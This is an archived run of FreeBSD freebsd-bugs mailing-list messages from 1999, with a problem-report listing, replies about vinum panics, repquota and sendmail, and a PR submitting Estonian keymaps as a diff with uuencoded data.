notes o [1999/09/25] docs/13960 doc Consulting group in Melbourne, Australia o [1999/09/25] docs/13961 doc Commercial Vendors - Consulting: Peter Br o [1999/09/25] docs/13962 doc Commercial Vendors - Consulting: Internet o [1999/09/25] docs/13963 doc Request for listing in Consultants Page: f [1999/09/25] docs/13964 phantom Vendor: Vancouver Internetworking f [1999/09/25] docs/13966 phantom Commercial Vendor list: Parabase Technolo o [1999/09/25] docs/13967 doc FreeBSD Related Publications in Korea f [1999/09/25] docs/13969 phantom Commercial Vendors - Hardware: ActiveWire o [1999/09/25] docs/13970 doc FreeBSD Newbie Newsletter o [1999/09/26] kern/13979 [PATCH] add serial number to IDE HD probe o [1999/09/26] docs/13984 doc additional entry in hardware section o [1999/09/26] ports/13986 ports New port: sysutils/gnometoaster o [1999/09/26] gnu/13989 SIGWINCH corrupts the display of a multil o [1999/09/27] ports/14001 scrappy [PATCH] New version 2.3.0 of the mico por o [1999/09/27] kern/14006 pas2_pcm.c pcm playback problem, with fix o [1999/09/28] docs/14024 doc Several manpages still mentions hosts.den o [1999/09/29] docs/14035 doc tzfile.h referenced in tzfile(5) doesn't o [1999/09/29] bin/14040 amd has wrong uname data compile in it o [1999/09/30] i386/14048 ``doscmd -r'' doesn't work o [1999/09/30] ports/14052 ports fvwm95-i18n - missing dependence to fbsd- o [1999/09/30] docs/14067 doc Vendor: Aeon/Xe Technology Pte Ltd o [1999/09/30] ports/14070 ports g2c libraries and compatibility for DJGPP o [1999/09/30] i386/14071 FreeBSD 3.3 Installation CD does not boot o [1999/10/01] docs/14074 grog vinum(8) manpage gets warning 4.7 o [1999/10/04] docs/14112 doc calls in ddb doc don't exist any longer o [1999/10/04] ports/14124 ports Update port: graphics/tiff to 3.5.2 o [1999/10/04] docs/14129 phantom gated(8) and htable(8) as referenced in r o [1999/10/04] kern/14136 no mean 'OVERRIDE_xxx' o [1999/10/04] ports/14137 ports New port: security/p5-Authen-PAM o [1999/10/04] kern/14138 sos writing to ZIP 250MB drive bombs via ATAP o [1999/10/05] bin/14142 sendmail: mci.c: bad pointer conversion i o [1999/10/05] bin/14151 Patch: date(1): merge in OpenBSD enhancem o [1999/10/06] docs/14158 doc md5(1) manpage should not claim the md5 a o [1999/10/06] docs/14159 doc Commercial Vendors - Software: Deskware, o [1999/10/06] ports/14160 ports New port: japanese/makejvf o [1999/10/06] ports/14161 ports New port: japanese/vfxdvik o [1999/10/06] docs/14165 doc FDP introduction article o [1999/10/06] kern/14166 AVER TVPhone o [1999/10/06] bin/14171 [PATCH] create symbolic links using mtree o [1999/10/06] ports/14172 ports New port: net/elsa o [1999/10/07] bin/14175 route for ip aliasing o [1999/10/07] ports/14176 imp seahaven(6) obtains SIGFPE o [1999/10/07] docs/14181 doc patch to bind(2) to include EAGAIN o [1999/10/07] ports/14182 asami Patch: bsd.port.mk: add plist target o [1999/10/07] ports/14185 ports ports/x11-wm/fvwm2 updated from 2.2.2 to o [1999/10/07] ports/14188 ports kdm bug and workaround o [1999/10/07] alpha/14200 alpha kldstat command has formatting problems o o [1999/10/08] ports/14209 ports Update port: graphics/giflib to libungif- o [1999/10/08] kern/14217 [PATCH] EXT2FS as a KLD o [1999/10/08] ports/14218 ports make sysutils/pkg_version use nik's patch o [1999/10/09] ports/14225 markm Patches for security/pgp5 o [1999/10/09] ports/14231 ache MD5 checksum error installing lynx-curren o [1999/10/09] ports/14235 gpalmer Update x11-clocks/xdaliclock to 2.14 o [1999/10/09] bin/14239 [PATCH] Trivial fortune spelling correcti o [1999/10/09] kern/14240 compilation error: __cmpdi2 unresolved o [1999/10/09] bin/14246 kvm_open and kvm_openfiles not works corr o [1999/10/10] docs/14248 doc codify proposed style o [1999/10/10] misc/14253 Mistake in dhclient-script(8) man page o [1999/10/10] bin/14255 rup and rusers could not deal with many h o [1999/10/11] misc/14258 IP_TOS and IP_TTL sockopt doesn't work on o [1999/10/11] ports/14260 ports New port: WODA - A Web Oriented Database o [1999/10/11] ports/14262 ports devel/boehm-gc ignores CFLAGS o [1999/10/11] misc/14263 phantom There ara no ukrainian locale in stable/c o [1999/10/11] i386/14266 vfsload() looks in /lkm, not /modules o [1999/10/11] misc/14269 NIS passwd and group maps do not clean ou o [1999/10/11] ports/14271 ports Yorick builds without X support o [1999/10/11] ports/14272 ports bringing mozilla port up to M10 o [1999/10/11] misc/14273 Somewhat bogus entry in termcap o [1999/10/11] ports/14276 ports New port: tkdiff-3.04 o [1999/10/11] kern/14278 'newpcm' does'nt compile with '-fno-built o [1999/10/12] ports/14280 kris port curl build flag USE_SSL does nothing o [1999/10/12] ports/14288 ports Kill palm/prc-tools o [1999/10/12] conf/14297 [Patch] pccard.conf for corega Ether PCC- o [1999/10/12] docs/14299 doc ruptime(1) manpage doesn't say hosts down o [1999/10/13] misc/14300 MAKEDEV requires /usr to be mounted (for o [1999/10/13] bin/14305 ru natd should know FTP EPRT command o [1999/10/13] ports/14311 ports New port: www/gnuinfo o [1999/10/13] ports/14312 ports New port: wmmatrix-0.2 o [1999/10/13] ports/14316 markm exmh not recognizing mh and uses too many o [1999/10/13] bin/14317 jkh sysintall: instructions to reboot don't m o [1999/10/13] bin/14318 jkh sysinstall upon install has some counter- o [1999/10/13] docs/14319 doc hostname(1) doesn't mention rc.conf o [1999/10/14] docs/14320 doc tzfile manual page has omissions and erro o [1999/10/14] docs/14321 doc Missing ld.so.1. o [1999/10/14] ports/14323 markm [PATCH] ports/security/pgp5: Invoked with o [1999/10/14] bin/14330 peter [PATCH] fix clash between /usr/src/contri o [1999/10/14] bin/14335 peter Manual page for ndc gives incorrect path o [1999/10/14] ports/14337 ports xdm and Eterm: tty allocation problem? o [1999/10/14] bin/14342 [PATCH] Speed ups for regex! o [1999/10/15] kern/14346 Both pccard/cardinfo.h and sys/memrange.h o [1999/10/15] kern/14350 Security enhancement to ICMP o [1999/10/15] ports/14353 jkoshy cvslines port has bad path to perl and rc o [1999/10/15] kern/14355 perhaps a guard page needed for UP-mode k o [1999/10/15] kern/14356 grog vinum and ``some processes would not die; o [1999/10/15] ports/14358 ports New port: fb a binary file viewer and edi o [1999/10/15] ports/14359 ports Update port: mail/imap-uw o [1999/10/16] ports/14360 ports xmms core dumps when trying to play strea o [1999/10/16] bin/14361 locate bogusly converts to network byte o o [1999/10/16] ports/14363 ports o [1999/10/17] ports/14366 ports wdm doesn't call setlogin() properly--act o [1999/10/17] bin/14368 marcel Update compat3x distribution o [1999/10/17] ports/14377 torstenb [PATCH] shells/zsh - fix zshall(1) o [1999/10/17] ports/14378 ports New port: graphics/mpeg o [1999/10/17] ports/14379 ports New port: graphics/xmrm o [1999/10/17] kern/14380 [PATCH] if_de workaround for when BIOS do o [1999/10/17] ports/14381 ports New port: games/x3eyes o [1999/10/17] ports/14382 ports New port: tkrat 2.0b3 o [1999/10/17] i386/14383 pthread_kill() does not call sighandler o o [1999/10/17] ports/14389 ports XScreensaver port does not properly detec o [1999/10/18] kern/14394 kernel panic when asking help in visual u o [1999/10/18] i386/14396 Floppy install of 3.2-release, 3.3-releas o [1999/10/18] docs/14401 doc ch0 device not documented in /dev/MAKEDEV o [1999/10/18] bin/14406 [SECURITY] strcpy() buffer overflow in um o [1999/10/18] ports/14409 ports New port: www/webfs-0.5 o [1999/10/18] ports/14411 ports news/ifmail deinstallation o [1999/10/19] ports/14420 ports news/cnews is broken with awk 3.0.3 o [1999/10/19] ports/14421 ports news/cnews honor PREFIX o [1999/10/19] docs/14426 doc FAQ entry on kernel panics needs updating o [1999/10/19] misc/14428 can't install from extended DOS partition o [1999/10/20] i386/14437 MFC'ed identcpu.c o [1999/10/20] i386/14438 additional CPUID bit definitions for iden o [1999/10/20] i386/14440 update to identcpu.c to "support" AMD K7' o [1999/10/20] ports/14442 ports New port: security/dante o [1999/10/20] ports/14443 ache ports/misc/screen screen-3.9.5 fix o [1999/10/21] bin/14448 ftp-client may not recognize failure, rep o [1999/10/21] docs/14449 doc time clamping effect of securelevel not d o [1999/10/21] ports/14452 ports Cyrus IMAP port leaves behind directories o [1999/10/21] ports/14454 ports New port: misc/wmfire o [1999/10/22] misc/14455 mdodd make release failure with PCCARD kernel o [1999/10/22] ports/14456 ports the apsfilter "requires" line on http://w o [1999/10/23] ports/14459 ports New port: graphics/epstool f [1999/10/23] docs/14460 jhb Fix broken links in the FAQ o [1999/10/23] ports/14461 jseger irc/zircon update to 1.18.224 o [1999/10/23] ports/14462 ports New port: net/radreport o [1999/10/23] conf/14463 cvs pserver does not work with out-of-the o [1999/10/23] ports/14464 ports Update Etherboot to 4.2.9 o [1999/10/23] ports/14467 ports New port: editors/xenon o [1999/10/23] ports/14468 ports New port: misc/makeself o [1999/10/23] ports/14469 ports remove port: deskutils/recycler o [1999/10/23] ports/14471 ports remove port: deskutils/xcalendar o [1999/10/23] ports/14478 ports status on port devel/gaa - feedback pleas o [1999/10/23] ports/14480 ports New port: p5-AppConfig-1.52 o [1999/10/23] conf/14487 Please Change "/usr/share/skel/dot.login" o [1999/10/23] misc/14488 kget doesn´t write the key word "enable" o [1999/10/23] ports/14489 ports New port: misc/gplbp o [1999/10/23] ports/14490 ports New port: games/krubik o [1999/10/24] ports/14495 ports New port: healthd o [1999/10/24] ports/14496 ports New port: graphics/tkxanim o [1999/10/24] ports/14497 ports New (binary) port: ksh93 o [1999/10/24] ports/14498 ports New port: gtic-1.3b o [1999/10/24] ports/14499 torstenb update port irc/ircII to 4.4L o [1999/10/24] ports/14500 ports New port: cmail f [1999/10/24] ports/14501 ports Update port: misc/rfc o [1999/10/24] ports/14503 ports New port: NetRexx o [1999/10/24] kern/14504 Framing Error on FreeBSD Laptop o [1999/10/25] misc/14511 chapss Y2K problem o [1999/10/25] ports/14515 ports New Tripwire 1.3 Port o [1999/10/25] ports/14516 ports ports net/mpich security-related update ( o [1999/10/25] ports/14517 ports New port: diffstat o [1999/10/25] ports/14519 erich GIMP 1.1.10 fails to save TIFF files. o [1999/10/25] conf/14522 dhclient incorrectly reads and sets hostn o [1999/10/25] misc/14523 mistake in traceroute `FREEBSD-upgrade' f o [1999/10/25] ports/14526 ports New port: math/grpn o [1999/10/25] bin/14527 cracauer sh here-documents failure o [1999/10/25] docs/14530 doc Printed manual pages have extraneous blan o [1999/10/25] bin/14532 doc Much of cam_cdbparse(3) prints in Courier o [1999/10/25] bin/14533 pccardd improperly assigns irqs o [1999/10/25] bin/14534 mpp Formatting man pages gives numeric expres o [1999/10/25] ports/14535 ports New port: Wolfpack Empire 4.2.6 o [1999/10/26] ports/14537 ports New port: ptkei o [1999/10/26] kern/14540 sef ulimit -c 0 and limits -c 0 no longer d o [1999/10/26] ports/14544 ports Kill tcl-8.1 and tk-8.1 o [1999/10/26] bin/14545 quota reports in K, but header says 'bloc o [1999/10/27] ports/14555 ports New port: xmixer o [1999/10/27] docs/14559 doc Site submission not up.. a [1999/10/27] kern/14561 ken ioctl (fd, CDIOCEJECT, (void*) 0) doesn't s [1999/10/27] kern/14562 ken ioctl() codes should be provided for ejec o [1999/10/27] docs/14563 doc Wrong manpage produced by `man 4 fd' o [1999/10/27] ports/14564 ports New port: www/p5-FastCGI o [1999/10/27] docs/14565 doc ioctl() codes for device type `fd' (flopp o [1999/10/27] ports/14570 ports New port: editors/ghex o [1999/10/27] ports/14571 ports Upgrade FP Exts to FrontPage 2000 Exts. o [1999/10/27] i386/14574 ISA based ESS1688 support(partially) for o [1999/10/28] ports/14582 cpiazza Fetchmail port "CONFIGURE_ARGS" additions o [1999/10/28] kern/14584 Proposition for improved file permissions o [1999/10/29] ports/14587 ports misc/buffer: spelling fix s [1999/10/29] kern/14590 kernel panic writing to floppy o [1999/10/29] ports/14591 ports Update port: xemacs-mule(body) o [1999/10/29] ports/14592 ports Update port: xemacs-mule-sumo(meta) o [1999/10/29] ports/14593 ports Update port: xemacs-mule(packages) o [1999/10/29] docs/14595 doc The ipfw `log' suboption is not documente o [1999/10/29] ports/14596 ports The fvwm-1.24r package lacks XPM support o [1999/10/29] ports/14597 ports Update port: cad/xcircuit o [1999/10/29] misc/14599 pam_kerberosIV.so in the 'krb.??' package o [1999/10/29] ports/14600 ports Add perl5 GDBM support to ports since bas o [1999/10/29] docs/14601 sheldonh sh.1 wrongly says bash is a ksh clone o [1999/10/29] kern/14602 struct utsname fields are allocated too s o [1999/10/29] ports/14605 markm Update port: security/xinetd to v2.1.8.7 o [1999/10/29] ports/14606 max Update port: net/delegate to v5.9.5 o [1999/10/30] ports/14610 ports New port: graphics/kplot3d o [1999/10/30] ports/14611 mharo update port audio/libmikmod, to v3.1.8 o [1999/10/30] ports/14612 ports New port: misc/rboot o [1999/10/30] ports/14613 ports New port: devel/freelibiberty o [1999/10/30] ports/14616 ports vfghostscript MASTER_SITE change o [1999/10/30] ports/14618 ports New port: librc4 o [1999/10/30] ports/14619 ports New port: security/libsasl o [1999/10/31] ports/14620 ports gimp1-i18n's PLIST lacks one file. o [1999/10/31] ports/14621 ports New port: x11/qrash o [1999/10/31] ports/14622 kuriyama Update to textproc/cocoon port o [1999/10/31] ports/14624 ports New port: Mathopd - A very small, yet ver o [1999/10/31] ports/14628 ports Update: lang/ruby o [1999/10/31] ports/14629 ports Update: x11-toolkits/rubytk o [1999/10/31] ports/14630 ports Update: x11-toolkits/ruby-gtk o [1999/10/31] ports/14631 ports Update: lang/irb o [1999/10/31] ports/14633 ports vflib upgrade: 2.24.1->2.24.2 o [1999/10/31] kern/14634 Mixer synth & mixer CD seem to be swapped o [1999/10/31] ports/14637 ports New Port for prips o [1999/10/31] ports/14638 ports New Port for ipsc o [1999/10/31] pending/14639gnats-adminconvert proc.p_peers to a queue(3) LIST o [1999/11/01] pending/14643gnats-adminA Chinese/English dictionary o [1999/11/01] pending/14644gnats-adminA Big5-localized & XIM-enabled XEmacs por o [1999/11/01] ports/14645 ports New port: games/dungeon, (Zork !) o [1999/11/01] kern/14646 kern.boottime affected by APM suspend/res o [1999/11/01] ports/14647 ports Upgrade of `hugs' port o [1999/11/01] bin/14648 markm `make world' now requires -DNOCRYPT in my o [1999/11/01] gnu/14649 Perl "tutorials" missing from documentati 1322 problems total. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Nov 1 11:34:45 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from plab.ku.dk (plab.ku.dk [130.225.105.65]) by hub.freebsd.org (Postfix) with ESMTP id 55E4B14C01; Mon, 1 Nov 1999 11:34:35 -0800 (PST) (envelope-from tobez@plab.ku.dk) Received: (from tobez@localhost) by plab.ku.dk (8.9.3/8.9.3) id UAA07996; Mon, 1 Nov 1999 20:35:43 +0100 (CET) (envelope-from tobez) Date: Mon, 1 Nov 1999 20:35:43 +0100 From: Anton Berezin To: julian@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org, bde@FreeBSD.org Subject: Re: bin/8164: [patch] repquota incorrectly reports quotas larger than 4Gbytes Message-ID: <19991101203542.A1539@plab.ku.dk> References: <199911010448.UAA25279@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre3i In-Reply-To: <199911010448.UAA25279@freefall.freebsd.org> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 31, 1999 at 08:48:27PM -0800, julian@FreeBSD.org wrote: > Synopsis: [patch] repquota incorrectly reports quotas larger than 4Gbytes > > State-Changed-From-To: open->closed > State-Changed-By: julian > State-Changed-When: Sun Oct 31 20:47:43 PST 1999 > State-Changed-Why: > applied patch > (to -current) Thanks! Would you please close 8163 then? The edquota problem was fixed in -current, when -current was 3.X, and we don't fix such minor problems in 2.2 series, do we? Cheers, -- Anton Berezin The Protein Laboratory, University of Copenhagen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Nov 1 12:18:14 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from yana.lemis.com (yana.lemis.com [192.109.197.140]) by hub.freebsd.org (Postfix) with ESMTP id 5DB881537D for ; Mon, 1 Nov 1999 12:18:02 -0800 (PST) (envelope-from grog@lemis.com) Received: from mojave.sitaranetworks.com ([199.103.141.157]) by yana.lemis.com (8.8.8/8.8.8) with ESMTP id GAA29946; Tue, 2 Nov 1999 06:46:38 +1030 (CST) (envelope-from grog@lemis.com) Message-ID: <19991101134756.38752@mojave.sitaranetworks.com> Date: Mon, 1 Nov 1999 13:47:56 -0500 From: Greg Lehey To: Robert Cousins , freebsd-bugs@FreeBSD.ORG Subject: Re: Problem with vinum causing panic 100% of the time Reply-To: Greg Lehey References: <381BD011.223FED6A@RCousins.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii In-Reply-To: <381BD011.223FED6A@RCousins.com>; from Robert Cousins on Sat, Oct 30, 1999 at 10:13:53PM -0700 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Saturday, 30 October 1999 at 22:13:53 -0700, Robert Cousins wrote: > Hello: > I have just finished building a system which panics regularly. > I fear I may have found a bug. From vinum(4): Reporting problems with Vinum If you find any bugs in vinum, please report them to Greg Lehey . Supply the following information: o The output of the vinum list command. o Any messages printed in /var/log/messages. All such messages will be identified by the text vinum at the beginning. o If you have a panic, a stack trace as described above. > All 4 IDE slots are connected to 37.5 gig IBM IDE Drives (IBM > DeskStar 37GPs. See this URL for more info: > http://www.storage.ibm.com/hardsoft/diskdrdl/prod/ds37gp34gxp.htm) > > I've loaded the standard 3.3 release (downloaded from > ftp.FreeBSD.org) and used the GENERIC kernel. (Haven't even cut out > the unnecessary drivers, turn on soft updates or anything else.) You should read http://www.lemis.com/vinum/bugs.html. There's a known bug in 3.3-RELEASE, but it affects the 'start' command, which doesn't appear to be what you're talking about. In any case, you should upgrade to -STABLE. > I loaded everything onto the two 9 gig drives. > Then, I connected the 4 IDE disks and brought them up. > They work just fine. > > However, when I use VINUM to tie them together and then build a huge > filesystem over it, the system panics as soon as I try to create a > file or directory in the new filesystem. (The mount point is creatively > named '/vinum' just so it would be easy to understand.) Basically, the information "the kernel panics" doesn't say very much. At very least you should give the panic string, but you should really also give me a stack trace. Also from vinum(4): Kernel Panics In order to analyse a panic which you suspect comes from vinum you will need to build a debug kernel. See the online handbook at /usr/share/doc/handbook/kerneldebug.html (if installed) or http://www.freebsd.org/handbook/kerneldebug.html for more details of how to do this. > www1# newfs -v /dev/vinum/rvinum0 > /dev/vinum/rvinum0: 293044224 sectors in 71544 cylinders of 1 tracks, 4096 sectors > 143088.0MB in 4472 cyl groups (16 c/g, 32.00MB/g, 7936 i/g) > super-block backups (for fsck -b #) at: > 32, 65568, 131104, 196640, 262176, 327712, 393248, 458784, 524320, 589856, 655392, 720928, 786464, 852000, 917536, 983072, Most of this output is not needed, but I *certainly* don't need the listing of the addresses of 4472 cylinder groups. > www1# vinum > vinum -> info > Flags: 0x80204 > Total of 16 blocks malloced, total memory: 13008 > Maximum allocs: 568, malloc table at 0xc0fb8814 > vinum -> list > Configuration summary > > Drives: 4 (8 configured) > Volumes: 1 (4 configured) > Plexes: 1 (8 configured) > Subdisks: 4 (16 configured) > > D vinumdrive0 State: up Device /dev/wd0s1e Avail: 0/35772 MB (0%) > D vinumdrive1 State: up Device /dev/wd1s1e Avail: 0/35772 MB (0%) > D vinumdrive2 State: up Device /dev/wd2s1e Avail: 0/35772 MB (0%) > D vinumdrive3 State: up Device /dev/wd3s1e Avail: 0/35772 MB (0%) > > V vinum0 State: up Plexes: 1 Size: 139 GB > > P vinum0.p0 S State: up Subdisks: 4 Size: 139 GB > > S vinum0.p0.s0 State: up PO: 0 B Size: 34 GB > S vinum0.p0.s1 State: up PO: 256 kB Size: 34 GB > S vinum0.p0.s2 State: up PO: 512 kB Size: 34 GB > S vinum0.p0.s3 State: up PO: 768 kB Size: 34 GB This looks fine. > www1# touch /vinum/foo > < > System Crashes and panics here OK, we need the information I asked for. I haven't seen this one before. Greg -- Finger grog@lemis.com for PGP public key See complete headers for address and phone numbers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Nov 1 12:43:45 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from pele.WURLDLINK.NET (pele.WURLDLINK.NET [208.164.68.2]) by hub.freebsd.org (Postfix) with ESMTP id A6D2B15305; Mon, 1 Nov 1999 12:43:11 -0800 (PST) (envelope-from vince@pele.WURLDLINK.NET) Received: from localhost (vince@localhost) by pele.WURLDLINK.NET (8.9.3/8.9.3) with ESMTP id KAA48162; Mon, 1 Nov 1999 10:43:40 -1000 (HST) (envelope-from vince@pele.WURLDLINK.NET) Date: Mon, 1 Nov 1999 10:43:40 -1000 (HST) From: Vincent Poy To: gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/14626: sendmail 8.9.3 bug with aliases in -CURRENT In-Reply-To: <199910312030.MAA81075@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 31 Oct 1999 gnats-admin@FreeBSD.org wrote: > Thank you very much for your problem report. > It has the internal identification `bin/14626'. > The individual assigned to look at your > report is: freebsd-bugs. > > >Category: bin > >Responsible: freebsd-bugs > >Synopsis: sendmail 8.9.3 bug with aliases in -CURRENT > >Arrival-Date: Sun Oct 31 12:30:01 PST 1999 It appears this is a bug in sendmail 8.9.3 that if the queue is too big and the queue retry interval is too short, it will tail the queue and resend the entire queue again. Only way to solve the problem is with a longer queue. Cheers, Vince - vince@WURLDLINK.NET - Vice President ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] WurldLink Corporation / / / / | / | __] ] San Francisco - Honolulu - Hong Kong / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] Almighty1@IRC - oahu.DAL.NET Hawaii's DALnet IRC Network Server Admin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Nov 2 1:20:28 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 275FC14BC2 for ; Tue, 2 Nov 1999 01:20:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA87458; Tue, 2 Nov 1999 01:20:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from gw.mig.ee (gw.mig.ee [193.40.95.142]) by hub.freebsd.org (Postfix) with ESMTP id C04F914CCC for ; Tue, 2 Nov 1999 01:14:45 -0800 (PST) (envelope-from priit@mig.ee) Received: from kalevt.mig (kalevt.mig [192.168.1.125]) by gw.mig.ee (8.8.3/8.7.3) with ESMTP id LAA12384 for ; Tue, 2 Nov 1999 11:14:30 +0200 Received: (from priit@localhost) by kalevt.mig (8.9.3/8.9.3) id LAA12104; Tue, 2 Nov 1999 11:20:41 +0200 (EET) (envelope-from priit) Message-Id: <199911020920.LAA12104@kalevt.mig> Date: Tue, 2 Nov 1999 11:20:41 +0200 (EET) From: Priit Järv Reply-To: priit@cc.ttu.ee To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: conf/14658: Estonian keymaps Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14658 >Category: conf >Synopsis: Estonian keymaps not yet included in FreeBSD distribution >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Nov 2 01:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Priit Järv >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: >Description: There are no estonian keymaps included yet with the FreeBSD distribution. However, there are already many estonian FreeBSD users, who might be interested in such a feature. >How-To-Repeat: >Fix: Apply the following diffs and add the uuencoded files to the source tree. *** share/syscons/keymaps/INDEX.keymaps Mon Oct 25 23:07:13 1999 --- /usr/share/syscons/keymaps/INDEX.keymaps Mon Nov 1 23:03:50 1999 *************** *** 74,79 **** --- 74,85 ---- danish.cp865.kbd:pt:Dinamarquês Codepage 865 danish.cp865.kbd:es:Danés Codepage 865 + estonian.iso15.kbd:en:Estonian ISO-8859-15 + + estonian.iso.kbd:en:Estonian ISO-8859-1 + + estonian.cp850.kbd:en:Estonian Codepage 850 + finnish.iso.kbd:en:Finnish ISO-8859-1 finnish.cp850.kbd:en:Finnish Codepage 850 begin 644 est-keymaps.tar MR<@("`@)WLG("`@(&YO<"`@("!N;W`@("`@($\*("`P,#D@("`G."<@ M("`@)R@G("`@(&5S8R`@("!E2<@("`@)UDG M("`@(&5M("`@("!E;2`@("`@)WDG("`@("=9)R`@("!E;2`@("`@96T@("`@ M("!#"B`@,#(R("`@)W4G("`@("=5)R`@("!N86L@("`@;F%K("`@("=U)R`@ M("`G52<@("`@;F%K("`@(&YA:R`@("`@0PH@(#`R,R`@("=I)R`@("`G22<@ M("`@:'0@("`@(&AT("`@("`G:2<@("`@)TDG("`@(&AT("`@("!H="`@("`@ M($,*("`P,C0@("`G;R<@("`@)T\G("`@('-I("`@("!S:2`@("`@)V\G("`@ M("=/)R`@("!S:2`@("`@B<@("`@)UHG("`@('-U M8B`@("!S=6(@("`@($,*("`P-#4@("`G>"<@("`@)U@G("`@(&-A;B`@("!C M86X@("`@)W@G("`@("=8)R`@("!C86X@("`@8V%N("`@("!#"B`@,#0V("`@ M)V,G("`@("=#)R`@("!E='@@("`@971X("`@("=C)R`@("`G0R<@("`@971X M("`@(&5T>"`@("`@0PH@(#`T-R`@("=V)R`@("`G5B<@("`@6X@("`@($,*("`P-#@@("`G M8B<@("`@)T(G("`@('-T>"`@("!S='@@("`@)V(G("`@("=")R`@("!S='@@ M("`@3(U(&9K97DS-R!S M8W(P,2`@3$T(&9K97DR-B!F:V5Y,S@@3`S(&9K97DQ-2!F:V5Y,C<@9FME>3,Y('-C M3(X(&9K97DT,"!S8W(P-"`@3$W(&9K97DR.2!F:V5Y-#$@3`V(&9K M97DQ."!F:V5Y,S`@9FME>30R('-C3,Q(&9K97DT,R!S8W(P M-R`@3(P(&9K97DS,B!F:V5Y-#0@3`Y(&9K97DR,2!F:V5Y,S,@9FME>30U('-C3,T(&9K97DT-B!S8W(Q,"`@34Q("34T("34W("38P("3(S(&9K97DS-2!F:V5Y-#<@3$R(&9K97DR-"!F:V5Y,S8@ M9FME>30X('-C30Y(&9K97DT.2!F:V5Y-#D@9FME M>30Y(&9K97DT.2!F:V5Y-#D@9FME>30Y(&9K97DT.2`@3PH@(#`Y-2`@(&9K M97DU,"!F:V5Y-3`@9FME>34P(&9K97DU,"!F:V5Y-3`@9FME>34P(&9K97DU M,"!F:V5Y-3`@($\*("`P.38@("!F:V5Y-3$@9FME>34Q(&9K97DU,2!F:V5Y M-3$@9FME>34Q(&9K97DU,2!F:V5Y-3$@9FME>34Q("!/"B`@,#DW("`@9FME M>34S(&9K97DU,R!F:V5Y-3,@9FME>34S(&9K97DU,R!F:V5Y-3,@9FME>34S M(&9K97DU,R`@3PH@(#`Y."`@(&9K97DU-2!F:V5Y-34@9FME>34U(&9K97DU M-2!F:V5Y-34@9FME>34U(&9K97DU-2!F:V5Y-34@($\*("`P.3D@("!F:V5Y M-3<@9FME>34W(&9K97DU-R!F:V5Y-3<@9FME>34W(&9K97DU-R!F:V5Y-3<@ M9FME>34W("!/"B`@,3`P("`@9FME>34X(&9K97DU."!F:V5Y-3@@9FME>34X M(&9K97DU."!F:V5Y-3@@9FME>34X(&9K97DU."`@3PH@(#$P,2`@(&9K97DU M.2!F:V5Y-3D@9FME>34Y(&9K97DU.2!F:V5Y-3D@9FME>34Y(&9K97DU.2!F M:V5Y-3D@($\*("`Q,#(@("!F:V5Y-C`@9FME>38P(&9K97DV,"!F:V5Y-C`@ M9FME>38P(&9K97DV,"!F:V5Y-C`@9FME>38P("!/"B`@,3`S"69K97DV,2!F M:V5Y-C$@9FME>38Q(&9K97DV,2!F:V5Y-C$@9FME>38Q(&)O;W0@("!F:V5Y M-C$@($\*("`Q,#0@("!S;&]C:R`@38R(&9K M97DV,B!F:V5Y-C(@9FME>38R(&9K97DV,B!F:V5Y-C(@9FME>38R(&9K97DV M,B`@3PH@(#$P-B`@(&9K97DV,R!F:V5Y-C,@9FME>38S(&9K97DV,R!F:V5Y M-C,@9FME>38S(&9K97DV,R!F:V5Y-C,@($\*("`Q,#<@("!F:V5Y-C0@9FME M>38T(&9K97DV-"!F:V5Y-C0@9FME>38T(&9K97DV-"!F:V5Y-C0@9FME>38T M("!/"B`@,3`X("`@;F]P("`@(&YO<"`@("!N;W`@("`@;F]P("`@(&YO<"`@ M("!N;W`@("`@;F]P("`@(&YO<"`@("`@3PH````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M``!S:&%R92]S>7-C;VYS+VME>6UA<',O97-T;VYI86XN:7-O+FMB9``````` M```````````````````````````````````````````````````````````` M````````````````,3`P-C0T(``@("`@(#`@`"`@("`@,"``("`@("`@,38V M,C$@(#"<@("`@)U@G("`@(&-A;B`@("!C86X@("`@($,*("`P-#8@ M("`G8R<@("`@)T,G("`@(&5T>"`@("!E='@@("`@)V,G("`@("=#)R`@("!E M='@@("`@971X("`@("!#"B`@,#0W("`@)W8G("`@("=6)R`@("!S>6X@("`@ 